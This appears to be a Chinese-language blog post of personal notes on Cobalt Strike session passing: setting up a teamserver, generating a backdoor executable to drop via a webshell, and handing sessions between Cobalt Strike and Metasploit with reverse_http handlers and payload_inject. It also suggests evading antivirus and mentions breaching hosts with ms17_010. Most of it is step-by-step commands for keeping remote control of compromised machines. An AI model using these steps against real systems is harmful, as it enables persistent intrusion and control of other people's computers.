cobalt strike 会话转移
我们在搞定了一台主机后,往往想要对其进行权限维持,提权的操作,这时后我们就可以使用cs生成一个后门程序,通过我们获得的webshell上传执行来进行进一步的利用。这里有几个容易忘记得操作,这里记录下来,方便以后复习。
一、CS会话传递到msf进行进一步利用
1.1 运行服务端
服务端一般放在我们得VPS等拥有公网ip地址的主机上面
我们在vps上面执行
cd obaltstrike4.3
./teamserver 192.168.248.142 111111
IP地址为我vps服务器本身的IP,111111为客户端连接的密码
这时候我们可以执行
netstat -ano | grep 50050
看到该端口已经打开了,teamserver默认在该端口监听
1.2 运行客户端
同样在我们的物理机上面同样要有cs的环境,进入里面有一个shell的可执行文件,我们执行它
./start.sh
这时候就会打开登录配置界面
输入连接的ip、端口号、用户名、密码即可登录成功
1.3 生成后门程序
1.3.1 设置监听器
http hosts 与http host(stager)填一样的为服务器ip,端口随便填为我本地的监听端口
1.3.2 生成后门
这里可选的种类很多,这里我们选择windows executable
选择号监听器,和输出的类型,其中有一个windows server 可以在启动项中使用,普通的是不能在启动项中使用的
同时windows executable是分段传输payload的,后门运行后会从服务端加载payload,所以可能会连接失败,还有一个windows executable(s)这是一个stageless,里面包含了完整的payload,所以相对来说较大。
1.4 运行后门程序
生成了后门后,把它发送到目标服务器运行,即可看到客户端有设备上线了!!!这玩意儿很容易被防火墙杀掉,考虑做一下免杀处理!
1.5添加会话
payload选择foreignhttp,stager主机填写运行msf的主机,ip也可自定义,添加完成后在选择payload串口选中刚添加的会话,然后点击choose即可
1.6 配置msf监听
进入msf,使用 exploit/mutil/handler模块,
然后设置lhost 为本机,lport为上一步添加会话时一致的端口,set payload windows/meterpreter/reverse_http
然后run
重新在客户端选择一次会话就成功了!!
二 msf会话传递到cs进行进一步利用
首先我们使用ms17_010或者其他漏洞打穿一个系统,进入到>meter界面,然后执行background,将该会话调度到后台,会回显一个session id给我们。
然后使用
use exploit/windows/local/payload_inject模块
set payload windows/meterpreter/reverse_http
set lhost 客户端主机ip
set lport 客户端监听器端口
set disablepayloadhandler true
set session id 上一步获得的sessionid
run
结束会回显进程id
然后我们到客户端就可以看到该进程id的主机上线了